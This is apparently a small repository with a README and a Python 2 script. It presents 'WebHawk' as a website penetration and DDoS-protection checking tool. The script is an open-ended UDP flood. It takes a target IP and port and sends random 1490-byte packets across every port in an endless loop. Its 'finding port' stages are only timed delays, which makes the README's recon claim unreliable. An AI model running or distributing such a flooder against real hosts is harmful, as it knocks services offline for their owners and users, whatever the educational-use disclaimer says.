├── README.md └── ddos.py /README.md: -------------------------------------------------------------------------------- 1 | # WebHawk 2 | WebHawk is an open source project for website Penetration and Ddos Protect checking Tool 3 | ## Follow Us 4 | #Cometolearnofficial 5 | #cometolearn 6 | 7 | YouTube : https://www.youtube.com/channel/UCtwT7_eBpry-8gqhdlH7UuQ 8 | 9 | Insta : @mastfaizan 10 | 11 | Site : https://termuxtools.com/ #Termux-Tools 12 | 13 | Facebook: best.faizan 14 | ## Features 15 | Attack a Specific Website for penetration testing 16 | dos attack with recon feature 17 | ## Platforms 18 | 19 | Kali And Termux 20 | 21 | 22 | ## Commands 23 | ``` 24 | pkg install php -y 25 | ``` 26 | ``` 27 | pkg install python-y 28 | ``` 29 | ``` 30 | pkg install git -y 31 | ``` 32 | ``` 33 | git clone https://github.com/c-t-l/WebHawk 34 | ``` 35 | ``` 36 | cd WebHawk 37 | ``` 38 | ``` 39 | python2 ddos.py 40 | ``` 41 | 42 | ### Note 43 | Do not Use it For Hacking This may lead a better case on you 44 | Only For Educational and Penetration Testing Purpose 45 | 46 | -------------------------------------------------------------------------------- /ddos.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | import time 4 | import socket 5 | import random 6 | #Code Time 7 | from datetime import datetime 8 | now = datetime.now() 9 | hour = now.hour 10 | minute = now.minute 11 | day = now.day 12 | month = now.month 13 | year = now.year 14 | 15 | ############## 16 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 17 | bytes = random._urandom(1490) 18 | ############# 19 | 20 | os.system("clear") 21 | os.system("figlet DDos Attack") 22 | print 23 | print "Author : C-T-L" 24 | print "You Tube : https://www.youtube.com/channel/UCAyg6ueTK6ht1ipOpebL3WA" 25 | print "github : https://github.com/c-t-l" 26 | print 27 | ip = raw_input("IP Target : ") 28 | port = input("Port : ") 29 | 30 | os.system("clear") 31 | os.system("figlet Dos") 32 | print "[ ] preparing" 33 | time.sleep(5) 34 | print "[===== ] started" 35 | time.sleep(5) 36 | print "[========== ] finding port" 37 | time.sleep(5) 38 | print "[=============== ] port finded" 39 | time.sleep(5) 40 | print "[====================] Attacking" 41 | time.sleep(3) 42 | sent = 0 43 | while True: 44 | sock.sendto(bytes, (ip,port)) 45 | sent = sent + 1 46 | port = port + 1 47 | print "Sent %s packet to %s throught port:%s"%(sent,ip,port) 48 | if port == 65534: 49 | port = 1 50 | 51 | --------------------------------------------------------------------------------